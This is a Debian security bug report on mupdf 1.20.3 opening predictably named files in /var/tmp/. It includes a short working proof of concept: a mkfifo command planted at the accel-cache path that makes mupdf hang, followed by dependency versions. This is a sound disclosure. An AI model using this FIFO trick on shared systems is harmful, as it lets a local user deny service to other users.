Package: mupdf Version: 1.20.3+ds1-1 Tags: security mupdf opens predictably-named files in /var/tmp/. Local users can exploit it for denial of service, maybe worse.
Proof of concept: $ mkfifo -m 644 /var/tmp/usr%share%doc%debian-history%docs%project-history.en.epub.accel $ mupdf /usr/share/doc/debian-history/docs/project-history.en.epub [hangs forever] -- System Information: Architecture: i386 Versions of packages mupdf depends on: ii freeglut3 2.8.1-6 ii libc6 2.34-8 ii libfreetype6 2.12.1+dfsg-3 ii libgl1 1.5.0-1 ii libgumbo1 0.10.1+dfsg-4 ii libharfbuzz0b 2.7.4-1+b1 ii libjbig2dec0 0.19-3 ii libjpeg62-turbo 1:2.1.2-1 ii libmujs2 1.2.0-3 ii libopenjp2-7 2.5.0-1 ii libssl3 3.0.5-2 ii libx11-6 2:1.8.1-2 ii libxext6 2:1.3.4-1 ii zlib1g 1:1.2.11.dfsg-4.1 Versions of packages mupdf suggests: ii mupdf-tools 1.20.3+ds1-1 -- Jakub Wilk
